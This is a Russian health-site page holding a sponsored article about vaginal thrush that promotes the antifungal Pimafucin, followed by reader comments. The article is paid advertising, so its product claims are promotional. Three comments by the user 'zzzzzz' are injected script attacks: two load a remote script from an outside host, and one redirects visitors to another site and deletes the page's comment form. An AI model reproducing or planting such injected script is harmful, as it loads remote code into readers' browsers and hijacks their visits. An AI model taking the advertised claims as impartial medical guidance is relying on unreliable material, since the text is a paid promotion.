Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Эффективное средство для ...  >>  Эффективное средство для борьбы с молочницей
 
Обратная связь
 

Эффективное средство для борьбы с молочницей

Размер шрифта
21 октября 2014 00:00
  • google_analytics: false
  • Нравится

Молочница – одно из самых распространенных грибковых заболеваний. Практически каждая женщина хотя бы раз в жизни сталкивается с этой проблемой.

Эффективное средство для борьбы с молочницей

К счастью, молочницу нельзя назвать очень серьезным заболеванием и никакой значительной опасности она не представляет, однако подпортить жизнь сможет наверняка. Увы, в интернете можно найти немало случаев неудачного лечения молочницы. Почему же так происходит?

Во-первых, неправильный диагноз. Молочница – не единственное заболевание, поражающее женские половые пути. Например, бактериальный вагиноз, возникающий при нарушении состава микрофлоры влагалища, иногда может сопровождаться сходными симптомами: зудом, жжением, беловатыми неприятно пахнущими выделениями из половых путей. Естественно, средства от молочницы в этом случае не помогут. Поэтому очень важно начинать лечение только после консультации со специалистом.

Во-вторых, использование народных средств. Так уж сложилось, что в нашей стране принято отдавать предпочтение народным средствам и избегать пользования средствами традиционной медицины. Но в большинстве случаев народные средства оказываются гораздо менее эффективными. В частности, спринцевание раствором соды и промывания отваром коры дуба попросту не способны уничтожить возбудителя молочницы (грибок рода Candida), а потому и не эффективны при молочнице.

В-третьих, выбор препарата. Средства от молочницы действуют по-разному: одни приостанавливают рост грибка, другие его уничтожают. Например, натамицин, входящий в состав Пимафуцина®, повреждает мембраны грибковых клеток, в результате чего эти клетки погибают. Еще один важный момент – лекарственная форма. Препараты могут выпускаться в разных лекарственных формах – это помогает сделать подход к лечению молочницы индивидуальным. В частности Пимафуцин® выпускается в трех формах: свечи, таблетки и крем. Свечи применяются при местном лечении молочницы у женщин, таблетки – для устранения грибковой инфекции в желудочно-кишечном тракте, крем – для лечения молочницы у мужчин. Кстати, Пимафуцин® подходит и для лечения молочницы у беременных.

Пимафуцин® обладает высокой активностью в отношении возбудителя молочницы и благоприятным профилем безопасности. Он уничтожает грибковые клетки и тем самым устраняет причину заболевания.1

Пимафуцин® можно использовать для комплексного лечения молочницы. Свечи Пимафуцин® предназначены для местного лечения молочницы у женщин. Таблетки Пимафуцин® помогают устранить очаг грибковой инфекции в кишечнике. Крем Пимафуцин® – для партнера (при наличии у него симптомов кандидного баланопостита), а также при грибковых поражениях кожи. 1

Пимафуцин® разрешен к применению на всех сроках беременности и в период лактации.1

Пимафуцин® действует только на грибковые клетки и безопасен для микрофлоры кишечника.1

Во избежание неудач в лечении молочницы, перед тем как принимать какие-либо препараты, обязательно проконсультируйтесь с врачом.

Представительство компании «Астеллас Фарма Юроп Б.В.» (Нидерланды), г. Москва

109147, Россия, г. Москва, ул. Марксистская, д. 16. Тел.:  +7 (495) 737 07 55, факс: +7 (495) 737 07 63 

ИМЕЮТСЯ ПРОТИВОПОКАЗАНИЯ. НЕОБХОДИМО ПРОКОНСУЛЬТИРОВАТЬСЯ СО СПЕЦИАЛИСТОМ

1.  Инструкция по медицинскому применению препарата Пимафуцин®(№П013552/01 от 07.06.11, №П0133552/02 от 09.10.08, П№013552/03 от 03.03.09)

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

17 июля 2015 в 08:32

Комментарий удален за нарушение Правил общения

5 - Гость

22 мая 2016 в 12:58

Цитировать   |   Пожаловаться

Мне помогли избавиться от молочницы свечи кетоконазол-альтфарм, с ними у меня довольно быстро прошли все симптомы и больше не было рецидивов, цена у них тоже недорогая, так что я бы их советовала.

Статьи

       
Как должно пахнуть у вас между ног   Как сохранить вашу любимую обувь и не заболеть?   Проблемы с ногами? Ученые говорят, что в этом виноваты вы сами!   Как не зарасти грибком  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Не показывайте мужчинам ноги – они выдадут все ваши секреты!
Как не покрыться грибком
Самые неожиданные причины молочницы

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.